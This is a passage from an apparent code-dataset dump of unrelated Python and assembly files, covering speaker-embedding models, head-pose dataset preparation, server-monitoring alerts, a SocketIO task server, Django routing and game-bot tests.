x = self.tdnn3(x)\n x = self.tdnn4(x)\n x = self.stats(x)\n x = self.tdnn7(x)\n x = self.auto(self.hidden_dropout, x)\n return x\n\n @utils.for_device_free\n def get_loss(self, inputs, targets):\n \"\"\"Should call get_loss() after forward() with using Xvector model function.\n e.g.:\n m=Xvector(20,10)\n loss=m.get_loss(m(inputs),targets)\n\n model.get_loss [custom] -> loss.forward [custom]\n |\n v\n model.get_accuracy [custom] -> loss.get_accuracy [custom] -> loss.compute_accuracy [static] -> loss.predict [static]\n \"\"\"\n if self.wrapper_loss is not None:\n return self.wrapper_loss(inputs, targets)\n else:\n return self.loss(inputs, targets)\n\n @utils.for_device_free\n def get_accuracy(self, targets):\n \"\"\"Should call get_accuracy() after get_loss().\n @return: return accuracy\n \"\"\"\n if self.wrapper_loss is not None:\n return self.wrapper_loss.get_accuracy(targets)\n else:\n return self.loss.get_accuracy(targets)\n\n @for_extract_embedding(maxChunk=10000, isMatrix=True)\n def extract_embedding(self, inputs):\n \"\"\"\n inputs: a 3-dimensional tensor with batch-dim = 1 or normal features matrix\n return: an 1-dimensional vector after processed by decorator\n \"\"\"\n\n x = inputs\n\n x = self.tdnn1(x)\n x = self.tdnn2(x)\n x = self.tdnn3(x)\n x = self.tdnn4(x)\n x = self.stats.transform(x)\n\n assert self.extracted_embedding == \"far\"\n xvector = x\n\n return xvector\n\n def get_warmR_T(T_0, T_mult, epoch):\n n = int(math.log(max(0.05, (epoch / T_0 * (T_mult - 1) + 1)), T_mult))\n T_cur = epoch - T_0 * (T_mult ** n - 1) / (T_mult - 1)\n T_i = T_0 * T_mult ** (n)\n return T_cur, T_i\n\n def compute_decay_value(self, start, end, T_cur, T_i):\n # Linear decay in every cycle time.\n return start - (start - end)/(T_i-1) * (T_cur%T_i)\n\n def step(self, epoch, this_iter, epoch_batchs):\n # Heated up for t and s.\n # Decay for margin and dropout p.\n if self.use_step:\n if self.step_params[\"m\"]:\n current_postion = epoch*epoch_batchs + this_iter\n lambda_factor = max(self.step_params[\"lambda_0\"], \n self.step_params[\"lambda_b\"]*(1+self.step_params[\"gamma\"]*current_postion)**(-self.step_params[\"alpha\"]))\n self.loss.step(lambda_factor)\n\n if self.step_params[\"T\"] is not None and (self.step_params[\"t\"] or self.step_params[\"p\"]):\n T_cur, T_i = get_warmR_T(*self.step_params[\"T\"], epoch)\n T_cur = T_cur*epoch_batchs + this_iter\n T_i = T_i * epoch_batchs\n\n if self.step_params[\"t\"]:\n self.loss.t = self.compute_decay_value(*self.step_params[\"t_tuple\"], T_cur, T_i)\n\n if self.step_params[\"p\"]:\n self.aug_dropout.p = self.compute_decay_value(*self.step_params[\"p_tuple\"], T_cur, T_i)\n\n if self.step_params[\"s\"]:\n self.loss.s = self.step_params[\"s_tuple\"][self.step_params[\"s_list\"][epoch]]\n\n\n\n","sub_path":"subtools/pytorch/model/serialized-tdnn-xvector.py","file_name":"serialized-tdnn-xvector.py","file_ext":"py","file_size_in_byte":9207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"339284061","text":"import scipy.io as sio\nimport pandas as pd\nfrom os import listdir\nfrom os.path import isfile, join\nfrom tqdm import tqdm\nimport sys\nimport cv2\nfrom moviepy.editor import *\nimport numpy as np\nimport argparse\nfrom mtcnn.mtcnn import MTCNN\n\n\ndef get_args():\n\tparser = argparse.ArgumentParser(description=\"This script cleans-up noisy labels \"\n\t \"and creates database for training.\",\n\t formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument(\"--db\", type=str, default='./BIWI',\n\t help=\"path to database\")\n\tparser.add_argument(\"--output\", type=str, default='./BIWI',\n\t help=\"path to output database mat file\")\n\tparser.add_argument(\"--img_size\", type=int, default=64,\n\t help=\"output image size\")\n\tparser.add_argument(\"--ad\", type=float, default=0.4,\n\t help=\"enlarge margin\")\n\t\n\n\targs = parser.parse_args()\n\treturn args\n\n\ndef main():\n\targs = get_args()\n\tmypath = args.db\n\toutput_path = args.output\n\timg_size = args.img_size\n\tad = args.ad\n\n\tisPlot = True\n\tdetector = MTCNN()\n\n\trandFlag = np.zeros(24)\n\trandFlag[0:16] = 1\n\trandFlag = np.random.permutation(randFlag)\n\n\tprint(randFlag)\n\toutput_train_path = output_path+'_train.npz'\n\toutput_test_path = output_path+'_test.npz'\n\n\tonlyfiles_png = []\n\tonlyfiles_txt = []\n\tfor num in range(0,24):\n\t\tif num<9:\n\t\t\tmypath_obj = mypath+'/0'+str(num+1)\n\t\telse:\n\t\t\tmypath_obj = mypath+'/'+str(num+1)\n\t\tprint(mypath_obj)\n\t\tonlyfiles_txt_temp = [f for f in listdir(mypath_obj) if isfile(join(mypath_obj, f)) and join(mypath_obj, f).endswith('.txt')]\n\t\tonlyfiles_png_temp = [f for f in listdir(mypath_obj) if isfile(join(mypath_obj, f)) and join(mypath_obj, f).endswith('.png')]\n\t\n\t\tonlyfiles_txt_temp.sort()\n\t\tonlyfiles_png_temp.sort()\n\n\t\tonlyfiles_txt.append(onlyfiles_txt_temp)\n\t\tonlyfiles_png.append(onlyfiles_png_temp)\n\tprint(len(onlyfiles_txt))\n\tprint(len(onlyfiles_png))\n\t\n\tout_imgs_train = []\n\tout_poses_train = []\n\n\tout_imgs_test = []\n\tout_poses_test = []\n\t\n\tfor i in range(len(onlyfiles_png)):\n\t\tprint('object %d' %i)\n\t\t\n\t\tmypath_obj = ''\n\t\tif i<9:\n\t\t\tmypath_obj = mypath+'/0'+str(i+1)\n\t\telse:\n\t\t\tmypath_obj = mypath+'/'+str(i+1)\n\n\t\tfor j in tqdm(range(len(onlyfiles_png[i]))):\n\t\t\t\n\t\t\timg_name = onlyfiles_png[i][j]\n\t\t\ttxt_name = onlyfiles_txt[i][j]\n\t\t\t\n\t\t\timg_name_split = img_name.split('_')\n\t\t\ttxt_name_split = txt_name.split('_')\n\n\t\t\tif img_name_split[1] != txt_name_split[1]:\n\t\t\t\tprint('Mismatched!')\n\t\t\t\tsys.exit()\n\n\n\t\t\tpose_path = mypath_obj+'/'+txt_name\n\t\t\t# Load pose in degrees\n\t\t\tpose_annot = open(pose_path, 'r')\n\t\t\tR = []\n\t\t\tfor line in pose_annot:\n\t\t\t\tline = line.strip('\\n').split(' ')\n\t\t\t\tL = []\n\t\t\t\tif line[0] != '':\n\t\t\t\t\tfor nb in line:\n\t\t\t\t\t\tif nb == '':\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tL.append(float(nb))\n\t\t\t\t\tR.append(L)\n\n\t\t\tR = np.array(R)\n\t\t\tT = R[3,:]\n\t\t\tR = R[:3,:]\n\t\t\tpose_annot.close()\n\n\t\t\tR = np.transpose(R)\n\n\t\t\troll = -np.arctan2(R[1][0], R[0][0]) * 180 / np.pi\n\t\t\tyaw = -np.arctan2(-R[2][0], np.sqrt(R[2][1] ** 2 + R[2][2] ** 2)) * 180 / np.pi\n\t\t\tpitch = np.arctan2(R[2][1], R[2][2]) * 180 / np.pi\n\n\n\n\t\t\timg = cv2.imread(mypath_obj+'/'+img_name)\n\t\t\timg_h = img.shape[0]\n\t\t\timg_w = img.shape[1]\n\t\t\tif j==0:\n\t\t\t\t[xw1_pre,xw2_pre,yw1_pre,yw2_pre] = [0,0,0,0]\n\t\t\tdetected = detector.detect_faces(img)\n\n\t\t\tif len(detected) > 0:\n\t\t\t\tdis_list = []\n\t\t\t\tXY = []\n\t\t\t\tfor i_d, d in enumerate(detected):\n\t\t\t\t\t\n\t\t\t\t\txv = []\n\t\t\t\t\tyv = []\n\t\t\t\t\tfor key, value in d['keypoints'].items():\n\t\t\t\t\t\txv.append(value[0]) \n\t\t\t\t\t\tyv.append(value[1])\n\t\t\t\t\t\n\t\t\t\t\tif d['confidence'] > 0.95:\n\t\t\t\t\t\tx1,y1,w,h = d['box']\n\t\t\t\t\t\tx2 = x1 + w\n\t\t\t\t\t\ty2 = y1 + h\n\t\t\t\t\t\txw1 = max(int(x1 - ad * w), 0)\n\t\t\t\t\t\tyw1 = max(int(y1 - ad * h), 0)\n\t\t\t\t\t\txw2 = min(int(x2 + ad * w), img_w - 1)\n\t\t\t\t\t\tyw2 = min(int(y2 + ad * h), img_h - 1)\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Crop the face loosely\n\t\t\t\t\t\t# x_min = int(min(xv))\n\t\t\t\t\t\t# x_max = int(max(xv))\n\t\t\t\t\t\t# y_min = int(min(yv))\n\t\t\t\t\t\t# y_max = int(max(yv))\n\t\t\t\t\t\t\n\t\t\t\t\t\t# h = y_max-y_min\n\t\t\t\t\t\t# w = x_max-x_min\n\n\t\t\t\t\t\t# xw1 = max(int(x_min - ad * w), 0)\n\t\t\t\t\t\t# xw2 = min(int(x_max + ad * w), img_w - 1)\n\t\t\t\t\t\t# yw1 = max(int(y_min - ad * h), 0)\n\t\t\t\t\t\t# yw2 = min(int(y_max + ad * h), img_h - 1)\n\n\t\t\t\t\t\tXY.append([xw1,xw2,yw1,yw2])\n\t\t\t\t\t\tdis_betw_cen = np.abs(xw1-img_w*2/3)+np.abs(yw1-img_h*2/3)\n\t\t\t\t\t\tdis_list.append(dis_betw_cen)\n\t\t\t\t\n\t\t\t\tif len(dis_list)>0:\n\t\t\t\t\tmin_id = np.argmin(dis_list)\n\t\t\t\t\t[xw1,xw2,yw1,yw2] = XY[min_id]\n\n\n\t\t\t\tdis_betw_frames = np.abs(xw1-xw1_pre)\n\t\t\t\tif dis_betw_frames < 80 or j==0:\n\t\t\t\t\timg = cv2.resize(img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))\n\t\t\t\t\t[xw1_pre,xw2_pre,yw1_pre,yw2_pre] = [xw1,xw2,yw1,yw2]\n\t\t\t\t\tif isPlot:\n\t\t\t\t\t\tprint([xw1_pre,xw2_pre,yw1_pre,yw2_pre])\n\t\t\t\t\t\tcv2.imshow('check',img)\n\t\t\t\t\t\tk=cv2.waitKey(10)\n\t\t\t\t\timg = cv2.resize(img, (img_size, img_size))\n\t\t\t\t\tcont_labels = np.array([yaw, pitch, roll])\n\t\t\t\t\t\n\t\t\t\t\tif randFlag[i] == 1:\n\t\t\t\t\t\tout_imgs_train.append(img)\n\t\t\t\t\t\tout_poses_train.append(cont_labels)\n\t\t\t\t\telif randFlag[i] == 0:\n\t\t\t\t\t\tout_imgs_test.append(img)\n\t\t\t\t\t\tout_poses_test.append(cont_labels)\n\t\t\t\telse:\n\t\t\t\t\timg = cv2.resize(img[yw1_pre:yw2_pre + 1, xw1_pre:xw2_pre + 1, :], (img_size, img_size))\n\t\t\t\t\t# Checking the cropped image\n\t\t\t\t\tif isPlot:\n\t\t\t\t\t\tprint([xw1_pre,xw2_pre,yw1_pre,yw2_pre])\n\t\t\t\t\t\tprint('Distance between two frames too large! Use previous frame detected location.')\n\t\t\t\t\t\n\t\t\t\t\t\tcv2.imshow('check',img)\n\t\t\t\t\t\tk=cv2.waitKey(10)\n\t\t\t\t\timg = cv2.resize(img, (img_size, img_size))\n\t\t\t\t\tcont_labels = np.array([yaw, pitch, roll])\n\t\t\t\t\tif randFlag[i] == 1:\n\t\t\t\t\t\tout_imgs_train.append(img)\n\t\t\t\t\t\tout_poses_train.append(cont_labels)\n\t\t\t\t\telif randFlag[i] == 0:\n\t\t\t\t\t\tout_imgs_test.append(img)\n\t\t\t\t\t\tout_poses_test.append(cont_labels)\n\t\t\telse:\n\t\t\t\timg = cv2.resize(img[yw1_pre:yw2_pre + 1, xw1_pre:xw2_pre + 1, :], (img_size, img_size))\n\t\t\t\tif isPlot:\n\t\t\t\t\tprint('No face detected! Use previous frame detected location.')\n\t\t\t\t\n\t\t\t\t# Checking the cropped image\n\t\t\t\tif isPlot:\n\t\t\t\t\tcv2.imshow('check',img)\n\t\t\t\t\tk=cv2.waitKey(10)\n\t\t\t\timg = cv2.resize(img, (img_size, img_size))\n\t\t\t\tcont_labels = np.array([yaw, pitch, roll])\n\t\t\t\tif randFlag[i] == 1:\n\t\t\t\t\tout_imgs_train.append(img)\n\t\t\t\t\tout_poses_train.append(cont_labels)\n\t\t\t\telif randFlag[i] == 0:\n\t\t\t\t\tout_imgs_test.append(img)\n\t\t\t\t\tout_poses_test.append(cont_labels)\n\tnp.savez(output_train_path,image=np.array(out_imgs_train), pose=np.array(out_poses_train), img_size=img_size)\n\tnp.savez(output_test_path,image=np.array(out_imgs_test), pose=np.array(out_poses_test), img_size=img_size)\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"data/TYY_create_db_biwi_70_30.py","file_name":"TYY_create_db_biwi_70_30.py","file_ext":"py","file_size_in_byte":6577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"105096244","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# events.py\n# \n# Copyright 2012 Silvano Wegener \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \nimport os, sys, json, time, re\nsys.path.append('/opt/s87/bin/lib')\nsys.path.append('/opt/s87/config')\nimport log\nimport system\nimport basic\nimport mail\n\nclass NormalToHigh_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.sendMail = mailMethod\n self.getValue = basic.valueGetter.get\n self.valueName = eventConfig['value']\n self.unit = eventConfig['unit']\n self.highValue = eventConfig['highValue']\n self.normalValue = eventConfig['normalValue']\n self.notifyInterval = eventConfig['notifyInterval'] \n self.eventInAction = False\n self.eventInActionStartTime = False\n\n def run(self):\n values = self.getValue(self.valueName)\n if not self.eventInAction:\n for value in values:\n if value >= self.highValue:\n subject = basic.HOSTNAME + ': ' + self.valueName + ' high!'\n message = self.valueName + ': ' + str(value) + self.unit\n self.sendMail(subject, message)\n self.eventInAction = True\n self.eventInActionStartTime = self.getTime()\n else:\n for value in values:\n if value <= self.normalValue:\n subject = basic.HOSTNAME + ': ' + self.valueName + ' normal.'\n message = self.valueName + ': ' + str(value) + self.unit\n self.sendMail(subject, message) \n self.eventInAction = False\n if self.getTime()-self.eventInActionStartTime >= self.notifyInterval:\n self.eventInAction = False\n\n def getTime(self):\n return time.mktime(time.localtime())\n\nclass High_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.getValue = basic.valueGetter.get\n self.sendMail = mailMethod\n self.valueName = eventConfig['value']\n self.unit = eventConfig['unit']\n self.highValue = eventConfig['highValue']\n self.notifyInterval = eventConfig['notifyInterval']\n self.eventInAction = False\n self.eventInActionStartTime = False\n\n def run(self):\n values = self.getValue(self.valueName)\n if not self.eventInAction:\n for value in values:\n subject = basic.HOSTNAME + ': ' + self.valueName + ' high!'\n message = self.valueName + ': ' + str(value) + self.unit\n self.sendMail(subject, message)\n self.eventInAction = True\n self.eventInActionStartTime = self.getTime()\n else:\n if self.getTime()-self.eventInActionStartTime >= self.againTime:\n self.eventInAction = False\n \n def getTime(self):\n return time.mktime(time.localtime())\n\nclass Low_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.getValue = basic.valueGetter.get\n self.sendMail = mailMethod\n self.valueName = eventConfig['value']\n self.unit = eventConfig['unit']\n self.lowValue = eventConfig['lowValue']\n self.notifyInterval = eventConfig['notifyInterval']\n self.eventInAction = False\n self.eventInActionStartTime = False\n\n def run(self):\n values = self.getValue(self.valueName)\n if not self.eventInAction:\n for value in values:\n if value <= self.lowValue:\n subject = basic.HOSTNAME + ': ' + self.valueName + ' low!'\n message = self.valueName + ': ' + str(value) + self.unit\n self.sendMail(subject, message)\n self.eventInAction = True\n self.eventInActionStartTime = self.getTime()\n else:\n if self.getTime()-self.eventInActionStartTime >= self.againTime:\n self.eventInAction = False\n \n def getTime(self):\n return time.mktime(time.localtime())\n\nclass FileChange_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.sendMail = mailMethod\n self.ignore = ('.swp',)\n self.path = eventConfig['path']\n if os.path.isfile(self.path):\n self.md5 = None\n self.oldmd5 = None\n elif os.path.isdir(self.path):\n self.md5 = {}\n self.oldmd5 = {} \n\n def run(self):\n if os.path.isfile(self.path):\n self.oldmd5 = self.md5\n self.md5 = os.popen('md5sum ' + self.path).read()[:32]\n if not self.md5 == self.oldmd5:\n subject = basic.HOSTNAME + ': File changed: ' + self.path\n message = 'changed from:\\n '+str(self.oldmd5)+'\\nto:\\n '+ self.md5\n self.sendMail(subject, message)\n elif os.path.isdir(self.path):\n self.oldmd5 = self.md5.copy()\n for entry in os.listdir(self.path):\n path = os.path.join(self.path, entry)\n if not path[-4:] in self.ignore:\n if os.path.isfile(path):\n self.md5[path] = os.popen('md5sum ' + path).read()[:32]\n try:\n if not self.md5[path] == self.oldmd5[path]:\n subject = basic.HOSTNAME + ': File changed: ' + path\n message = 'changed from:\\n '+str(self.oldmd5[path])+'\\nto:\\n '+ self.md5[path]\n self.sendMail(subject, message) \n except KeyError:\n pass\n\nclass HDDFreeSpaceLow_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.getValue = basic.valueGetter.get\n self.sendMail = mailMethod\n self.mointPoint = eventConfig['mountPoint']\n self.notifyInterval = eventConfig['notifyInterval']\n self.minimalMB = eventConfig['minimalMB']\n self.eventInAction = False\n self.eventInActionStartTime = False\n\n def run(self):\n mointPointInfos = self.getValue('HDDFREESPACE')\n try:\n if not self.eventInAction:\n if mointPointInfos[self.mointPoint]['free'] <= self.minimalMB:\n subject = basic.HOSTNAME + ': HDD low free space: ' + self.mointPoint\n message = self.mointPoint + ':\\n' + json.dumps(mointPointInfos[self.mointPoint], indent=4)\n self.sendMail(subject, message)\n self.eventInAction = True\n self.eventInActionStartTime = self.getTime()\n else:\n if self.getTime()-self.eventInActionStartTime >= self.notifyInterval:\n self.eventInAction = False \n except KeyError:\n return False\n\n def getTime(self):\n return time.mktime(time.localtime())\n\nclass InternetOffline_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.sendMail = mailMethod\n self.reactionTime = eventConfig['reactionTime']\n self.onlineCheckIPs = eventConfig['onlineCheckIPs']\n self.offlineTime = 0\n self.eventInAction = False\n self.lastOnlineTime = False\n self.mailSended = False\n\n def run(self):\n psax = system.getRunningProcesses()\n if not 's87reconnect' in psax:\n online = False\n for server in self.onlineCheckIPs:\n if basic.ping(server):\n online = True\n break\n if online:\n if self.eventInAction:\n self.offlineTime = self.getTime()-self.lastOnlineTime\n subject = basic.HOSTNAME + ': connection error!'\n message = 'Internet connection was down for '+ str(self.offlineTime) + ' sec.\\nNew ip is ' + system.getExternIP()\n self.sendMail(subject, message) \n self.lastOnlineTime = self.getTime()\n self.eventInAction = False\n self.mailSended = False\n else:\n self.eventInAction = True\n if self.eventInAction:\n if self.lastOnlineTime <= self.getTime()-self.reactionTime:\n if not self.mailSended:\n subject = basic.HOSTNAME + ': connection error!'\n message = 'Internet connection is down!'\n self.sendMail(subject, message)\n self.mailSended = True \n\n def getTime(self):\n return time.mktime(time.localtime())\n\nclass DailyHDDSpaceInfo_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.getValue = basic.valueGetter.get\n self.sendMail = mailMethod\n self.valueName = eventConfig['value']\n self.time = eventConfig['time']\n self.mailSended = False\n \n def run(self):\n if time.strftime('%H:%M') == self.time:\n if not self.mailSended:\n values = self.getValue(self.valueName)\n subject = basic.HOSTNAME + ': ' + self.valueName + ' info.'\n message = 'HDD Memory Info:\\n\\n'\n for mountPoint in values.keys():\n if mountPoint in basic.s87config['s87notify']['mountPoints']:\n message += mountPoint + ':\\n '+'capacity:'.ljust(20,'.') + str(values[mountPoint]['capacity']).rjust(12,'.')+ ' MB\\n ' + 'free:'.ljust(20,'.')+ str(values[mountPoint]['free']).rjust(12,'.')+ ' MB\\n ' + 'in use:'.ljust(20,'.')+ str(values[mountPoint]['used%']).rjust(12,'.') + ' %\\n\\n'\n self.sendMail(subject, message)\n self.mailSended = True\n else:\n self.mailSended = False\n\nclass Customized_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.sendMail = mailMethod\n self.command = eventConfig['command']\n self.searchText = eventConfig['searchText']\n self.eventByFound = eventConfig['eventByFound']\n self.interval = eventConfig['interval']\n self.eventInAction = False\n self.eventInActionStartTime = False\n try:\n self.runCommand = eventConfig['run']\n except KeyError:\n self.runCommand = False\n\n def run(self):\n if not self.eventInAction:\n self.eventInAction = True\n self.eventInActionStartTime = self.getTime()\n out = os.popen(self.command + ' 2>&1').read().decode(\"utf8\")\n if self.searchText in out:\n found = True\n else:\n found = False\n \n if found == self.eventByFound:\n subject = basic.HOSTNAME + ': Customized_Event.'\n message = 'Customized_Event:\\n\\nCommand:\\n '+ self.command + '\\n\\nOutput:\\n ' + out\n self.sendMail(subject, message)\n if not self.runCommand == False:\n os.popen(self.runCommand + ' &')\n else:\n if self.getTime()-self.eventInActionStartTime >= self.interval:\n self.eventInAction = False \n\n def getTime(self):\n return time.mktime(time.localtime())\n\n\n\n\n\n","sub_path":"bin/lib/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":12023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"493623782","text":"'''\n以server方式启动系统\n'''\n\nfrom flask_socketio import emit\nimport json\n\nimport NodeCheck\nimport NodeConnect\nimport NodeManager\nimport NodeSourceManager\nimport TaskManager\nimport TaskSchedule\nimport Web\n\n\nclass Server(object):\n def __init__(self):\n print(\"Start as Server...\")\n\n def load_modules(self):\n '''\n 载入7个模块\n '''\n self.node_check = NodeCheck.NodeCheck()\n self.node_connect = NodeConnect.NodeConnect()\n self.node_manager = NodeManager.NodeManager()\n self.node_source_manager = NodeSourceManager.NodeSourceManager()\n self.task_manager = TaskManager.TaskManager()\n self.task_schedule = TaskSchedule.TaskSchedule()\n self.web = Web.Web()\n\n def start(self):\n '''\n 作为服务器启动\n '''\n self.web.start()\n\n\nserver = Server()\nserver.load_modules()\n\nsocketio = server.web.get_socketio()\n\n@socketio.on_error()\ndef default_error(e):\n print('Error')\n\n\n@socketio.on('message')\ndef connect(message):\n print('Get message', message)\n\n\n@socketio.on('test')\ndef test(messgae):\n print('Get a test message', message)\n\n\n@socketio.on('GET_TASK')\ndef get_a_task():\n # 获取一个task\n TM = TaskManager.TaskManager()\n a = TM.get_task_in_queue()\n # 将task中的部分内容转换成json字符串\n data = {\n 'id':a.index,\n 'passcode':a.passcode,\n 'sourcefile_path':a.sourcefile_path,\n }\n json_str = json.dumps(data)\n # 将json字符串返回\n emit('GET_TASK_response',json_str)\n\n\nif __name__ == '__main__':\n server.start()\n","sub_path":"server_start.py","file_name":"server_start.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"127190859","text":"from .base import Base\n\nclass Filter(Base):\n def __init__(self, vim):\n super().__init__(vim)\n self.name = \"converter_remove_info\"\n self.description = \"Remove unnecessary data from completions\"\n\n def filter(self, context):\n for candidate in context[\"candidates\"]:\n candidate.pop(\"info\", None)\n if candidate.get(\"kind\", None) == \"Module\":\n candidate.pop(\"menu\", None)\n return context[\"candidates\"]\n","sub_path":"nvim/rplugin/python3/deoplete/filter/converter_remove_info.py","file_name":"converter_remove_info.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"542799060","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom rest_framework import routers\nfrom api.views import (TheoremViewSet, \n AxiomViewSet,\n AxiomHighlight, \n DefinitionViewSet,\n UserViewSet,\n GroupViewSet,\n TheoremHighlight,\n DefinitionHighlight,\n ArgumentViewSet,\n StatementViewSet,\n BookViewSet,)\n\nfrom rest_framework.decorators import api_view, renderer_classes\nfrom rest_framework_swagger.renderers import OpenAPIRenderer, SwaggerUIRenderer\nfrom rest_framework import renderers, response, schemas\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\n\nrouter = routers.DefaultRouter()\n\nrouter.register(r'users',UserViewSet)\nrouter.register(r'books', BookViewSet)\nrouter.register(r'arguments',ArgumentViewSet)\nrouter.register(r'statements',StatementViewSet)\n\n\n@api_view()\n@renderer_classes([SwaggerUIRenderer, OpenAPIRenderer, renderers.CoreJSONRenderer])\ndef schema_view(request):\n generator = schemas.SchemaGenerator(title='OKR API')\n return response.Response(generator.get_schema(request=request))\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url('^$', schema_view),\n url(r'^api/', include(router.urls)),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n\n","sub_path":"ox_proofs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129778351","text":"import random \nimport struct \n\nf= open(\"data.s\",'w')\nf.write('.section \".text\" \\n.align 4\\n.global gen \\n.type gen, #function\\ngen:\\n\\tsave %sp, -120, %sp\\n\\tset data,%i0\\n\\trestore\\n\\tretl\\n\\tnop\\n.section \".data\"\\n.align 8 \\n.global data\\ndata:\\n')\ni=0\nwhile(i<32):\n\tf.write(\".word\t\")\n\t#x=random.randrange(-1000, 100, 2)\n\t#f.write(str(x))\n\n\t#x=random.uniform(-2.56,0)\n\t#s = struct.pack('>f', x)\n\t#i = struct.unpack('>I', s)[0]\n\t#f.write(hex(i))\n\tx=int(i/2)\n\tf.write('0x3f800000')\n\tf.write('\\n')\n\tf.write(\".word\t\")\n\tf.write('0x3f800000')\n\tf.write('\\n')\n\ti+=2\n\t\nf.close()\n","sub_path":"fft/fft_radix_two_complex/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"527038753","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\tests\\plugins\\poweradminurt\\iourt42\\test_cmd_kill.py\n# Compiled at: 2016-03-08 18:42:10\nfrom mock import call, Mock\nfrom b3.config import CfgConfigParser\nfrom b3.plugins.poweradminurt import PoweradminurtPlugin\nfrom tests.plugins.poweradminurt.iourt42 import Iourt42TestCase\n\nclass Test_cmd_kill(Iourt42TestCase):\n\n def setUp(self):\n super(Test_cmd_kill, self).setUp()\n self.conf = CfgConfigParser()\n self.conf.loadFromString('\\n[commands]\\npakill-kill: 20\\n ')\n self.p = PoweradminurtPlugin(self.console, self.conf)\n self.init_default_cvar()\n self.p.onLoadConfig()\n self.p.onStartup()\n self.console.say = Mock()\n self.console.write = Mock()\n self.moderator.connects('2')\n\n def tearDown(self):\n super(Test_cmd_kill, self).tearDown()\n\n def test_no_argument(self):\n self.moderator.message_history = []\n self.moderator.says('!kill')\n self.assertEqual(['invalid data, try !help pakill'], self.moderator.message_history)\n self.console.write.assert_has_calls([])\n\n def test_unknown_player(self):\n self.moderator.message_history = []\n self.moderator.says('!kill f00')\n self.assertEqual(['No players found matching f00'], self.moderator.message_history)\n self.console.write.assert_has_calls([])\n\n def test_joe(self):\n self.joe.connects('3')\n self.moderator.message_history = []\n self.moderator.says('!kill joe')\n self.assertEqual([], self.moderator.message_history)\n self.assertEqual([], self.joe.message_history)\n self.console.write.assert_has_calls([call('smite 3')])","sub_path":"pycfiles/b3-1.10.10-py2.7/test_cmd_kill.py","file_name":"test_cmd_kill.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"422190767","text":"import ConfigParser\nimport os\n\n\ndef output_hello_world():\n print(\"Hello World!\")\n return True\n\n\ndef check_options():\n opt_path = os.path.dirname(os.path.abspath(__file__))\n opt_file = os.path.join(opt_path, \"..\\\\runTestOptions.ini\")\n config = ConfigParser.ConfigParser()\n try:\n config.readfp(open(opt_file))\n return config.get(\"TESTING_OPTIONS\", \"TestCases\")\n except IOError:\n print(\"ERR: opt_file path incorrect with - %s\" % opt_file)\n\n\nif __name__ == \"__main__\":\n print(\"Entering demo\")\n","sub_path":"1604_robot/libraries/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"255351463","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 30 17:43:54 2020\n\n@author: konrad\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport ot\nimport time\nfrom scipy.interpolate import griddata\nfrom skimage.measure import block_reduce\nfrom scipy.spatial.distance import cdist\n\nimport VortexLine as VL\nimport PhysicalCalculations as PC\n\n# %% Exvelo base\ndef exvelo_base(xt, yt, ut, vt):\n u_out = griddata(np.vstack((x.flatten(), y.flatten())).transpose(),\n ut.flatten(), np.vstack((xt, yt)).transpose())\n v_out = griddata(np.vstack((x.flatten(), y.flatten())).transpose(),\n vt.flatten(), np.vstack((xt, yt)).transpose())\n return u_out, v_out\n\n\n# %%Setup \nAoA = (0, 10, 20)\nn_weights = 11\n\ntemp = np.linspace(0., 1, 